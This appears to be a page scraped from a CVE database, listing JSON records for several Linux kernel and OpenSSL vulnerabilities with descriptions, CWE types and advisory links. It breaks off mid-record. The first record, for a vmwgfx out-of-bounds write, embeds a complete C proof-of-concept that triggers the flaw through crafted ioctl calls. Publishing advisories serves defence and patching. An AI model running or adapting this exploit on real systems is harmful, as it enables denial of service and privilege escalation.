{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T10:00:04.335Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071" }, { "name": "DSA-5324", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "Linux", "versions": [ { "lessThan": "5.13.0-52*", "status": "affected", "version": "v3.2-rc1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "datePublic": "2022-09-06T00:00:00", "descriptions": [ { "lang": "en", "value": "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ], "exploits": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int handle,int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n 0x2000,\n PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n strerror(errno));\n }\n \n memset(vaddr,\"a\",0x2000); \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0x2000;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1; \n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint handle=alloc_bo();\n int sid = create_surface(); \n printf(\"%d\",sid); \n poc(handle,sid); \n \n}" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-120", "description": "CWE-120 Buffer Overflow", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "shortName": "Anolis" }, "references": [ { "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071" }, { "name": "DSA-5324", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2023/dsa-5324" }, { "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071" ], "discovery": "INTERNAL" }, "title": "There is an out-of-bounds write vulnerability in vmwgfx driver", "x_generator": { "engine": "Vulnogram 0.0.9" } } }, "cveMetadata": { "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "assignerShortName": "Anolis", "cveId": "CVE-2022-36280", "datePublished": "2022-09-09T14:39:50.986805Z", "dateReserved": "2022-09-07T00:00:00", "dateUpdated": "2024-09-17T00:01:20.651Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-4037
Vulnerability from cvelistv5
Published
2022-08-24 00:00
Modified
2024-08-03 17:16
Severity ?
EPSS score ?
Summary
A vulnerability was found in the fs/inode.c:inode_init_owner() function logic of the LInux kernel that allows local users to create files for the XFS file-system with an unintended group ownership and with group execution and SGID permission bits set, in a scenario where a directory is SGID and belongs to a certain group and is writable by a user who is not a member of this group. This can lead to excessive permissions granted in case when they should not. This vulnerability is similar to the previous CVE-2018-13405 and adds the missed fix for the XFS.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T17:16:02.950Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004810" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2027239" }, { "tags": [ "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2021-4037" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=01ea173e103e" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0fa3ecd87848" }, { "name": "DSA-5257", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in Linux-kernel v5.11-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in the fs/inode.c:inode_init_owner() function logic of the LInux kernel that allows local users to create files for the XFS file-system with an unintended group ownership and with group execution and SGID permission bits set, in a scenario where a directory is SGID and belongs to a certain group and is writable by a user who is not a member of this group. This can lead to excessive permissions granted in case when they should not. This vulnerability is similar to the previous CVE-2018-13405 and adds the missed fix for the XFS." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-284", "description": "CWE-284 - Improper Access Control", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2004810" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2027239" }, { "url": "https://access.redhat.com/security/cve/CVE-2021-4037" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=01ea173e103e" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0fa3ecd87848" }, { "name": "DSA-5257", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5257" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2021-4037", "datePublished": "2022-08-24T00:00:00", "dateReserved": "2021-12-01T00:00:00", "dateUpdated": "2024-08-03T17:16:02.950Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-20566
Vulnerability from cvelistv5
Published
2022-12-16 00:00
Modified
2024-08-03 02:17
Severity ?
EPSS score ?
Summary
In l2cap_chan_put of l2cap_core, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-165329981References: Upstream kernel
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T02:17:52.898Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://source.android.com/security/bulletin/pixel/2022-12-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Android", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Android kernel" } ] } ], "descriptions": [ { "lang": "en", "value": "In l2cap_chan_put of l2cap_core, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-165329981References: Upstream kernel" } ], "problemTypes": [ { "descriptions": [ { "description": "Elevation of privilege", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-16T00:00:00", "orgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6", "shortName": "google_android" }, "references": [ { "url": "https://source.android.com/security/bulletin/pixel/2022-12-01" } ] } }, "cveMetadata": { "assignerOrgId": "baff130e-b8d5-4e15-b3d3-c3cf5d5545c6", "assignerShortName": "google_android", "cveId": "CVE-2022-20566", "datePublished": "2022-12-16T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-03T02:17:52.898Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2153
Vulnerability from cvelistv5
Published
2022-08-31 00:00
Modified
2024-08-03 00:32
Severity ?
EPSS score ?
Summary
A flaw was found in the Linux kernel’s KVM when attempting to set a SynIC IRQ. This issue makes it possible for a misbehaving VMM to write to SYNIC/STIMER MSRs, causing a NULL pointer dereference. This flaw allows an unprivileged local attacker on the host to issue specific ioctl calls, causing a kernel oops condition that results in a denial of service.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:32:07.943Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2069736" }, { "tags": [ "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2022/06/22/1" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/7ec37d1cbe17d8189d9562178d8b29167fe1c31a" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/00b5f37189d24ac3ed46cb7f11742094778c46ce" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/b1e34d325397a33d97d845e312d7cf2a8b646b44" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "kernel 5.18" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel\u2019s KVM when attempting to set a SynIC IRQ. This issue makes it possible for a misbehaving VMM to write to SYNIC/STIMER MSRs, causing a NULL pointer dereference. This flaw allows an unprivileged local attacker on the host to issue specific ioctl calls, causing a kernel oops condition that results in a denial of service." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-11-01T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2069736" }, { "url": "https://www.openwall.com/lists/oss-security/2022/06/22/1" }, { "url": "https://github.com/torvalds/linux/commit/7ec37d1cbe17d8189d9562178d8b29167fe1c31a" }, { "url": "https://github.com/torvalds/linux/commit/00b5f37189d24ac3ed46cb7f11742094778c46ce" }, { "url": "https://github.com/torvalds/linux/commit/b1e34d325397a33d97d845e312d7cf2a8b646b44" }, { "name": "[debian-lts-announce] 20221002 [SECURITY] [DLA 3131-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00000.html" }, { "name": "[debian-lts-announce] 20221101 [SECURITY] [DLA 3173-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00001.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-2153", "datePublished": "2022-08-31T00:00:00", "dateReserved": "2022-06-21T00:00:00", "dateUpdated": "2024-08-03T00:32:07.943Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1077
Vulnerability from cvelistv5
Published
2023-03-27 00:00
Modified
2024-08-02 05:32
Severity ?
EPSS score ?
Summary
In the Linux kernel, pick_next_rt_entity() may return a type confused entry, not detected by the BUG_ON condition, as the confused entry will not be NULL, but list_head.The buggy error condition would lead to a type confused entry with the list head,which would then be used as a type confused sched_rt_entity,causing memory corruption.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Linux kernel |
Version: unknown |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:32:46.360Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=7c4a5b89a0b5a57a64b601775b296abf77a9fe97" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230511-0002/" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "unknown" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, pick_next_rt_entity() may return a type confused entry, not detected by the BUG_ON condition, as the confused entry will not be NULL, but list_head.The buggy error condition would lead to a type confused entry with the list head,which would then be used as a type confused sched_rt_entity,causing memory corruption." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-843", "description": "CWE-843", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T19:06:55.294655", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=7c4a5b89a0b5a57a64b601775b296abf77a9fe97" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230511-0002/" }, { "name": "[debian-lts-announce] 20240111 [SECURITY] [DLA 3710-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1077", "datePublished": "2023-03-27T00:00:00", "dateReserved": "2023-02-27T00:00:00", "dateUpdated": "2024-08-02T05:32:46.360Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-26607
Vulnerability from cvelistv5
Published
2023-02-26 00:00
Modified
2024-08-02 11:53
Severity ?
EPSS score ?
Summary
In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T11:53:54.320Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lkml.org/lkml/2023/2/21/1353" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230316-0010/" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=36a4d82dddbbd421d2b8e79e1cab68c8126d5075" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1208703" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-03-25T00:41:12.014749", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://lkml.org/lkml/2023/2/21/1353" }, { "url": "https://security.netapp.com/advisory/ntap-20230316-0010/" }, { "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=36a4d82dddbbd421d2b8e79e1cab68c8126d5075" }, { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1208703" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-26607", "datePublished": "2023-02-26T00:00:00", "dateReserved": "2023-02-26T00:00:00", "dateUpdated": "2024-08-02T11:53:54.320Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3169
Vulnerability from cvelistv5
Published
2022-09-09 00:00
Modified
2024-08-03 01:00
Severity ?
EPSS score ?
Summary
A flaw was found in the Linux kernel. A denial of service flaw may occur if there is a consecutive request of the NVME_IOCTL_RESET and the NVME_IOCTL_SUBSYS_RESET through the device file of the driver, resulting in a PCIe link disconnect.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:00:10.578Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.kernel.org/show_bug.cgi?id=214771" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "4.19" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel. A denial of service flaw may occur if there is a consecutive request of the NVME_IOCTL_RESET and the NVME_IOCTL_SUBSYS_RESET through the device file of the driver, resulting in a PCIe link disconnect." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-22T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.kernel.org/show_bug.cgi?id=214771" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-3169", "datePublished": "2022-09-09T00:00:00", "dateReserved": "2022-09-09T00:00:00", "dateUpdated": "2024-08-03T01:00:10.578Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1292
Vulnerability from cvelistv5
Published
2022-05-03 15:15
Modified
2024-09-16 22:24
Severity ?
EPSS score ?
Summary
The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T23:55:24.565Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20220503.txt" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=548d3f280a6e737673f5b61fce24bb100108dfeb" }, { "name": "[debian-lts-announce] 20220515 [SECURITY] [DLA 3008-1] openssl security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html" }, { "name": "DSA-5139", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5139" }, { "name": "FEDORA-2022-b651cb69e6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/" }, { "name": "FEDORA-2022-c9c02865f6", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/" }, { "tags": [ "x_transferred" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220602-0009/" }, { "tags": [ "x_transferred" ], "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220729-0004/" }, { "name": "GLSA-202210-02", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202210-02" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "status": "affected", "version": "Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2)" }, { "status": "affected", "version": "Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n)" }, { "status": "affected", "version": "Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd)" } ] } ], "credits": [ { "lang": "en", "value": "Elison Niven (Sophos)" } ], "datePublic": "2022-05-03T00:00:00", "descriptions": [ { "lang": "en", "value": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd)." } ], "metrics": [ { "other": { "content": { "lang": "eng", "url": "https://www.openssl.org/policies/secpolicy.html#Moderate", "value": "Moderate" }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "description": "Command injection", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-14T00:00:00", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "url": "https://www.openssl.org/news/secadv/20220503.txt" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=548d3f280a6e737673f5b61fce24bb100108dfeb" }, { "name": "[debian-lts-announce] 20220515 [SECURITY] [DLA 3008-1] openssl security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html" }, { "name": "DSA-5139", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5139" }, { "name": "FEDORA-2022-b651cb69e6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/" }, { "name": "FEDORA-2022-c9c02865f6", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/" }, { "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "url": "https://security.netapp.com/advisory/ntap-20220602-0009/" }, { "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011" }, { "url": "https://security.netapp.com/advisory/ntap-20220729-0004/" }, { "name": "GLSA-202210-02", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202210-02" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf" } ], "title": "The c_rehash script allows command injection" } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2022-1292", "datePublished": "2022-05-03T15:15:19.758225Z", "dateReserved": "2022-04-11T00:00:00", 